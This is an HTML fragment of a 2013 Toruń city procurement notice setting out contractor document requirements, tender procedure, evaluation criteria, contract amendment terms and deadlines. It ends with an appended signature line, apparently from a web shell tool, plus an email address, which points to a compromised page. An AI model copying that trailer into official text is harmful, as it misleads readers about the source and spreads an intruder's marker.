<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pisemne zobowiązanie podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, jeżeli Wykonawca polega na wiedzy 
i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolności finansowej innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.
Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w pkt 3.2, 3.3.siwz polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda od Wykonawcy przedstawienia  w odniesieniu do tych podmiotów dokumentu wymienionego w pkt 4.4.siwz
Jeżeli wykonawca,  wykazując spełnienie warunków , o których mowa w pkt 3.2., 3.3. siwz polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, zamawiający, w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów żąda  dokumentów dotyczących w szczególności: 
a)zakresu dostępnych wykonawcy zasobów innego podmiotu, 
b)sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, 
c)charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.
-oświadczenie, iż Wykonawca spełnia warunki określone w art. 22 ust. 1 prawa zamówień publicznych,
-oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy,
-oświadczenie stwierdzające, że osoby, które będą uczestniczy w wykonywaniu zamówienia posiadają wymagane uprawnienia
-oświadczenie Wykonawcy, które z informacji zawartych w ofercie na stronach od .... do .... stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy o zwalczaniu nieuczciwej konkurencji i jako takie nie mogą być udostępniane innym uczestnikom postępowania
Brak powyższego oświadczenia oznaczał będzie, że dokumenty składające się na ofertę nie stanowią tajemnicy przedsiębiorstwa (Wykonawca nie może zastrzec wszystkich dokumentów).
-oświadczenie Wykonawcy jaką cześć zamówienia zamierza powierzyć podwykonawcom (jeżeli wykonawca przewiduje wykonanie przedmiotu zamówienia przy udziale podwykonawców).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.W przypadkach przewidzianych w umowie dopuszcza się wprowadzenie zmian za zgodą stron umowy.
2.Zmiany mogą być inicjowane przez Zamawiającego lub przez Wykonawcę.
3.Dopuszczalne jest dokonanie zmian umowy:
1)jeżeli zmiana  umowy będzie korzystna dla Zamawiającego i w szczególności dotyczyć będzie: 
a)zmiany technologii  wykonawstwa robót,
b)zamiany materiałów przewidzianych do wykonania robót określonych w §1 umowy,
c)innych nie wymienionych zmian korzystnych dla Zamawiającego,
2)jeżeli zmiana umowy dotyczyć będzie zmiany terminu wykonania przedmiotu  zamówienia    z przyczyn niezależnych od którejkolwiek ze stron,  które w szczególności dotyczyć będą:
a)uwarunkowań formalno-prawnych, w szczególności dotyczących wprowadzenia zmian do dokumentacji projektowej na etapie projektowania zadania z przyczyn niezależnych od obu stron,
3)jeżeli zmiana umowy dotyczyć będzie konieczności wprowadzenia do zakresu przedmiotu umowy ewentualnych opracowań dodatkowych lub zamiennych, w szczególności wynikających z zaistniałych na etapie projektowania nieprzewidzianych uwarunkowań technicznych, formalno-prawnych,  których nie można było przewidzieć w  chwili zawarcia umowy,  z ewentualną korektą wynagrodzenia ustaloną na podstawie negocjacji stron. 
4.Do każdej propozycji zmiany, inicjujący zmianę przedstawi: 
-opis propozycji zmiany, w tym wpływ na terminy wykonania,
-uzasadnienie zmiany,
-obliczenia uzasadniające ewentualną zmianę wynagrodzenia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.torun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Torunia - Wydział Inwestycji i Remontów, Toruń, przy ul. Wały gen. Sikorskiego 10    (sekretariat)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.05.2013 godzina 10:00, miejsce: Urząd Miasta Torunia - Wydział Inwestycji i Remontów, Toruń, przy ul. Wały gen. Sikorskiego 10    (sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com